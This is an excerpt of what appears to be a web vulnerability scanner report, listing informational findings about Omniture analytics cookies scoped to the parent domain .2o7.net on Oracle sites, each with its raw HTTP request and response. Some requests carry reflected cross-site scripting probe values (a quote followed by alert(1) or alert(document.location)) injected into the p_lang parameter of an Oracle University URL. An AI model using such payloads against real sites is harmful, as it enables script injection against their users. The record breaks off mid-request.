GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A46%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&v24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Query&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:47 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:54:47 GMT Last-Modified: Wed, 07 Sep 2011 15:54:47 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664247-443F-7E91E57E" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www33 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.36. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A33%202%20300&pageName=Search%3A%20All%3A%20Query&g=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&r=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&cc=USD&c20=New&v20=New&c24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&v24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Error%3A404%3Ahttp%3A//www.oracle.com/us/sitemaps/sitemaps.html&pidt=1&oid=functiononclick%28event%29%7Bjavascript%3Adocument.searchForm.keyword.value%3D%27%27%7D&oidt=2&ot=TEXT&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?default=true&keyword=phone&start=1&nodeid=&fid=&showSimilarDoc=true&group=All User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4E664230[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:34 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:54:34 GMT Last-Modified: Wed, 07 Sep 2011 15:54:34 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66423A-1A91-321F443B" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www118 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.37. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025?AQB=1&ndh=1&t=6/8/2011%2016%3A2%3A20%202%20300&pageName=OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage%3Fpage_id%3D501&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Search%20Test&c20=New&v20=New&c22=%28db_pages.getpage%3Fpage_id%3D501%29&c38=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&c39=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501 Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:02:24 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:02:24 GMT Last-Modified: Wed, 07 Sep 2011 16:02:24 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664410-12E6-6E8221CD" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www116 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.38. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A9%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2 Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:02:10 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:02:10 GMT Last-Modified: Wed, 07 Sep 2011 16:02:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664402-4052-4A49592A" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www362 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.39. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569?[AQB]&ndh=1&t=6/8/2011%2016%3A1%3A43%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2 Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:01:44 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:01:44 GMT Last-Modified: Wed, 07 Sep 2011 16:01:44 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E6643E8-0CDE-17D956AD" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www374 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.40. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A31%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%281%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(1)//43d7466ae8e Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:02:32 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:02:32 GMT Last-Modified: Wed, 07 Sep 2011 16:02:32 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664418-4A55-7F3D450F" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www598 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.41. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862?[AQB]&ndh=1&t=6/8/2011%2016%3A3%3A42%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%28document.location%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate 